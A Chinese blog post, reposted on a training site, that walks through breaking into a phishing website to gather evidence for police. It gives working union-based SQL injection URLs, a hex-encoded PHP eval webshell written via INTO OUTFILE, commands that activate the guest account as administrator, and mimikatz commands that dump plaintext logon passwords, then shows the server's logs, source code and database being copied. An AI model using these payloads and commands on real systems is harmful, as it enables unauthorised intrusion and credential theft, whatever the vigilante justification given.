前言: 前段时间加了个设计群,某人说朋友被骗钱在群里吐了两天苦水,原先真不打算管这事,没太多时间管闲事.无奈昨晚下了
前段时间加了个设计群,某人说朋友被骗钱在群里吐了两天苦水,原先真不打算管这事,没太多时间管闲事.无奈昨晚下了场大雨,没办法出门跑步,一时技痒就顺道把钓鱼站黑了顺道把网站日志跟服务器登陆日志打包出来.所以有了这篇文章记录一下过程.
0x01 溯源准备
1.1 开始
看到链接下看到后缀php?uid=,初步判断应该是php+mysql的网站..复制链接到电脑浏览器打开后下意识职业病uid=87’
1.2 爆出路径,可能存在sql注入
得到路径D:\xxxxx\zz\index.php,加上header头数据初步判断得出是Windows+Apache+Php+Mysql的网站,能爆路径很概率会有Sql注入,我们先记录下来路径是D:\xxxxx\ http://www.xxxx.cn/zz/index.php?zt=1&uid=87 xor 1=1 //返回正常 http://www.xxxx.cn/zz/index.php?zt=1&uid=87 xor 1=2 //返回错误
1.3 有sql注入
本来想掏出SQLMAP一把梭,结果sqlmap居然没注入出来..可能是我的操作有问题..只能手工注入了.
1.4 猜字段数目
当尝试注入语句字段个数为26返回正确,27返回错误,说明字段数等于26. http://www.xxxx.cn/zz/index.php?zt=1&uid=87 order by 26 //返回正常 http://www.xxxx.cn/zz/index.php?zt=1&uid=87 order by 27 //返回错误
1.5 联合查询语句,暴出可显示字段
http://www.xxxxx.cn/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26
1.6 暴出数据库用户、版本、库名和路径信息.
system_user() 系统用户名 user() 用户名 current_user当前用户名 session_user()连接数据库的用户名 database() 数据库名 version() MYSQL 数据库版本 load_file() MYSQL 读取本地文件的函数 @@datadir 读取数据库路径 @@basedir MYSQL 安装路径 @@version_compile_os 操作系统 http://www.xxxx.cn/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,user(),database(),7,8,version(),10,11,12, @@basedir,14,15,16,17,18,19,20,21,22,23,24,25,26
运气不错是root权限,不用大费周章跑去后台传马,直接写,记录信息 root@localhost^^5.5.40^^xxxx^^D:/phpStudy/MySQL/
1.7 写入Webshell
结合我们刚才爆出的网站路径D:\xxxxx\zz\ php一句话 去https://www.107000.com/T-Hex/ 转成hex16进制加上0x 得出写入Webhsell语句. http://www.xxxxx.cn/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,0x3C3F706870206576616C28245F504F53545B2774657374275D293F3E,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile ‘D:/xxxxx/zz/weiho.php’
1.8 提升权限
连接上去看一下权限,Administrator..典型phpstudy安装完啥也不管直接把站丢上去的情况..还想着要不Mysql UDF或者MOF提权. 这里接下来有两种做法,直接启用guest,添加密码以及管理员权限. 第二种下个wce读取明文,以administrator的权限登陆. Ps:wce需要管理员或管理员以上的权限才可以,一般情况下配合本地提权exploit,但这里是Administrator.可以忽略掉要提权的操作. 不过我们这里选前者,直接启用guest账号.先查看下对方在不在VPS里.状态:断开. query users //查看登陆用户名会话名 ID 状态空闲时间登录时间 administrator 2 断开 1+21:09 2021/7/11 23:15 et user guest /active:yes &net localgroup administrators guest /add & net user guest weiho4444@ 命令成功完成。
1.9 登陆远程桌面
nmap -sS -A -v -p- –open xxxx.cn 我进来这服务器前用nmap大概扫了一下.有三个端口开放80,3306,3389.本来想爆破3306.telnet过去没到三秒结束会话, 后面登陆才发现设置了IP.3389一般是远程桌面的端口.直接本地连过去就行了. 运行远程桌面 mstsc
1.10 读取明文密码
mimikatz 先下载回来,由于这VPS是x86系统所以运行x86的mimikatz Ps:一定要是管理员权限才能运行. privilege::debug sekurlsa::logonpasswords
得到管理员administrator密码540cxxxxxx.把自己账号禁了,以管理员进去.
0x02 开始溯源
2.1 拷贝系统日志Security和System
C:\Windows\System32\winevt\Logs
2.2 Apache日志 error.log
“C:\Program Files\WinRAR\Rar.exe” a -k -r -s -m1 D:\xxxxxx\error.rar D:\phpStudy\Apache\logs
2.3 打包网站源码
“C:\Program Files\WinRAR\Rar.exe” a -k -r -s -m1 D:\xxxxxx\1.rar D:\xxxxx\
2.4 导出mysql数据库
mysqldump -uroot -proot123456 dbname > D:\xxxxx\dbname.sql
0x03 后话
把数据打包后,让那哥们交民警结果人家民警同志不信..说我数据可能伪造.我说让民警直接联系我吧,然后blabla不了了之,就立了案.OMG.大写服气.后面让玄道转交给江苏的网警同志.今天(7.14)记录一下昨晚(7.13)的大概过程.中间省略了一些不太必要的过程.后续可以做的事,分析apache以及系统日志.做个后门记录远程桌面访问的IP,以及iframe之类的引用插入后台相关地址记录.查看Web服务器日志得到对应IP.
0x04 参考资料与工具
一个PHP+Mysql手工注入例子
Mysql注入方式
Hex编码解码
使用mimikatz_trunk获取计算机密码
Web教程网是一个专注于技术资讯的综合性门户网站。是Web爱好者学习交流的网站,这里提供大量实用的技术文档及相关资源下载,是网页设计、网络编程人员及其爱好者必备网站。
文章出自:http://qh.itpxw.cn/peixun/web/202185859.html
文章标题:[Web安全]记一次钓鱼网站调查取证
免责声明:本站文章均由入驻起航学习网的会员所发或者网络转载,所述观点仅代表作者本人,不代表起航学习网立场。如有侵权或者其他问题,请联系举报,必删。侵权投诉
IT培训网 访问该机构站点 报名留言 加为好友 用户等级:注册会员
用户级别:10
机构名称:IT培训网
联 系 人:罗老师
联系电话:13783581536
联系手机:13783581536
在线客服:
在 线 QQ:
电子邮件:
网站域名:http://www.itpxw.cn
注册时间:2016-07-18 11:07
最后登录:2024-02-20 13:02
今天小T要跟大家分享的文章是关于更适合做Web前端开发的几类...
今天小T要跟大家分享的文章是关于Web前端开发小白必备的学习...
今天小T要跟大家分享的文章是关于0基础小白学Web前端开发的学...
今天小T要跟大家分享的文章是关于Web前端开发工程师必备的排...